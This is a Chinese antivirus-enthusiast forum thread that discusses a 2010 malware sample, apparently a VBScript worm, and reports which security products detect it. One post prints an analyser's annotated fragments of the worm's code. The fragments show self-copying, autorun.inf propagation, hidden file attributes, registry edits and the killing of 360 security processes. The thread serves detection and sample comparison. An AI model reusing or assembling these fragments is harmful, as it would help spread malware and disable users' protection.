8.14开心包，今日一个样本，估计是脚本病毒，高质量~

62590423

回复 8楼 hansyu  的帖子


    杯具的病，我又换成norton了

hansyu

杯具的病，我又换成norton了
62590423 发表于 2010.8.14 09:08

还好，因为本地版有脚本阻断。

lianyeguzhou

回复 1楼 思齐鼠  的帖子


    小a拦截下载

zdlzp

Rem 普通操作:这个脚本可能会创建文件夹。
    ws.run "cmd /c start  "&h&":\",vbhide

Rem 普通操作:这个脚本可能会创建文件夹。
     ws.run "cmd /c set date=date &&date 2006-01-01 &&ping -n 15 127.0.0.1&&date date",vbhide

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
call writereg (hlmshow, 0, "reg_dword")

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
         call del_attrib(hh&":\autorun.inf")

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
         call add_attrib(hh&":\autorun.inf")

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
         call add_attrib(hh&":\system.vbs")

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
sub add_attrib(file)

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
    if f.attributes = 6 then

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
        f.attributes = 6

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
sub del_attrib(file)

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
    if f.attributes = 0 then

Rem 可能会带来威胁:这个脚本可能会加/减文件的属性。
        f.attributes = 0

Rem 可能带来威胁:这个脚本可能会自我复制。
fso.getfile (wscript.scriptfullname).copy (dir1&"\nvcpldaemon.vbs"),true

Rem 可能带来威胁:这个脚本可能会自我复制。
         fso.getfile(wscript.scriptfullname).copy(hh&":\system.vbs")

Rem 可能带来威胁:这个脚本可能会自我复制。
        fso.getfile (wscript.scriptfullname).copy (dir1&"\nvcpldaemon.vbs")

Rem 可能带来威胁:这个脚本可能会写入文件。
    link.writeline(d)

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("[autorun]")

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("open=")

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("shell\open=打开(&o)")

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("shell\open\command=wscript.exe "&autovbs)

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("shell\open\default=1")

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("shell\explore=资源管理器(&x)")

Rem 可能带来威胁:这个脚本可能会写入文件。
link.writeline("shell\explore\command=wscript.exe "&autovbs)

Rem 可能带来威胁:这个脚本可能会关闭进程。
sub close_process(processname)

Rem 可能带来威胁:这个脚本可能会关闭进程。
close_process("360tray.exe")

Rem 可能带来威胁:这个脚本可能会关闭进程。
close_process("360safe.exe")

Rem 可能带来威胁:这个脚本可能会关闭进程。
   close_process("360tray.exe")

Rem 可能带来威胁:这个脚本可能会关闭进程。
   close_process("360safe.exe")

Rem 可能带来威胁:这个脚本可能会关闭进程。
     close_process("cmd.exe")

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
        tmps.regwrite strkey, value

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
        tmps.regwrite strkey, value, vtype

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
     ws.regwrite key,win1

Rem 可能带来威胁:这个脚本可能会对注册表进行操作。
     ws.regdelete keydel360&"\360safetray"

370800674

还没有下载 就提醒了

小淘气

BitDefender 2010

This web page has been blocked by BitDefender Antivirus Real-time Protection!

The web page blocked by BitDefender included objects that were either infected or likely to be infected with a virus. Your system has NOT been infected.

xiaohai95

Generic.ScriptWorm.62A18101 (virus)

    * D:\我的文档\下载\开心包.rar\system.rar\system.vbs
    * D:\我的文档\下载\开心包.rar Action: quarantined

找不到新用户名

to 金山网盾
to eset
红伞 kill

hj5abc

FS
Generic.ScriptWorm.62A18101

囧神

回复


    这个东东会关闭360的进程啊
思齐鼠 发表于 2010.8.14 08:38

囧，一眼看上去是这样。但其实是关不掉的。反倒直接被360卫士KILL了。囧囧囧